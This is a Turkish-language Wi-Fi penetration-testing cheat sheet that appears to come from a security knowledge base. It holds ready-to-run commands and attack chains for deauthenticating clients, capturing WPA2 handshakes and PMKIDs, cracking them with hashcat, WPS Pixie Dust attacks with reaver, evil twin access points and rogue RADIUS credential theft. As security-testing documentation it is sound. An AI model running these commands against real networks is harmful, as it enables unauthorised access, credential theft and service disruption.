Skip to content

WiFi

Kablosuz ağ testi; radyo katmanının doğası gereği fiziksel erişim (veya yeterli sinyal menzili) gerektiren ama kablolu ağdan farklı bir saldırı yüzeyi sunar. Bu bölüm WPA2 handshake/PMKID kırma, WPS zayıflıkları, evil twin, WEP ve WPA-Enterprise saldırılarını Türkçe olarak ele alır.

Monitor mode + paket enjeksiyonu destekleyen bir adaptör gerekir (ör. birçok Atheros/Ralink/Realtek çipli USB kart; macOS yerleşik kartları genelde yetersiz).

Terminal window
iw dev
Terminal window
sudo airmon-ng check kill
Terminal window
sudo airmon-ng start wlan0 # → wlan0mon
Terminal window
iw dev # type monitor
Terminal window
sudo aireplay-ng -9 wlan0mon # injection testi
Terminal window
sudo airmon-ng stop wlan0mon
Terminal window
sudo systemctl start NetworkManager
  1. Keşif — AP’ler, kanallar, istemciler, ENC/AUTH, WPS, probe’lar.

  2. Hedef seçimi — WEP / WPS / zayıf PSK / Enterprise / açık ağ önceliği.

  3. Malzeme toplama — handshake, PMKID, WPS PIN, rogue RADIUS hash, portal creds.

  4. Kırma / kimlik — hashcat 22000/5500, Pixie, wordlist+rules.

  5. Erişim & sonrası — ağa katılım → Network / AD .

Hedefİlk tercihAlternatif
WPA2-PSK, istemci varHandshake + deauthPMKID
WPA2-PSK, istemci yokPMKIDBekle / evil twin
WPS Enabled, unlockedPixie DustPIN brute
Enterprise (PEAP/MSCHAPv2)Rogue RADIUS + eaphammerCaptive hibrit
Açık / misafirEvil twin / sniffKARMA
WEPARP replay + aircrackFragmentation
WPA3-SAEKlasik PSK kırma yokBaşka vektör / kapsam dışı not
aircrack-ng suite → airmon, airodump, aireplay, aircrack
hcxdumptool/hcxtools → PMKID + EAPOL → hashcat 22000
reaver / bully / OneShot → WPS
eaphammer / hostapd-wpe → Enterprise rogue
wifiphisher / hostapd-mana → evil twin / KARMA
hashcat / john → offline kırma
mdk4 → deauth / DoS çeşitleri
airodump keşif → WPS unlocked
→ reaver -K 1 → PSK → iç ağ nmap / SMB
hcxdumptool PMKID → hashcat 22000 → PSK
→ hostapd aynı PSK twin → MITM
AUTH=MGT → eaphammer --creds → hashcat -m 5500
→ domain password spray
ENC=WEP → aireplay -3 → aircrack-ng → key → IoT segment
Terminal window
sudo airmon-ng check kill && sudo airmon-ng start wlan0
Terminal window
sudo airodump-ng --band abg wlan0mon
Terminal window
sudo wash -i wlan0mon
Terminal window
sudo airodump-ng -c CH --bssid BSSID -w cap wlan0mon
Terminal window
sudo aireplay-ng --deauth 5 -a BSSID -c CLIENT wlan0mon
Terminal window
hcxpcapngtool -o hash.22000 cap-01.cap
Terminal window
hashcat -m 22000 hash.22000 rockyou.txt
Terminal window
sudo hcxdumptool -i wlan0mon -w pmkid.pcapng --enable_status=15
Terminal window
sudo reaver -i wlan0mon -b BSSID -c CH -K 1 -vv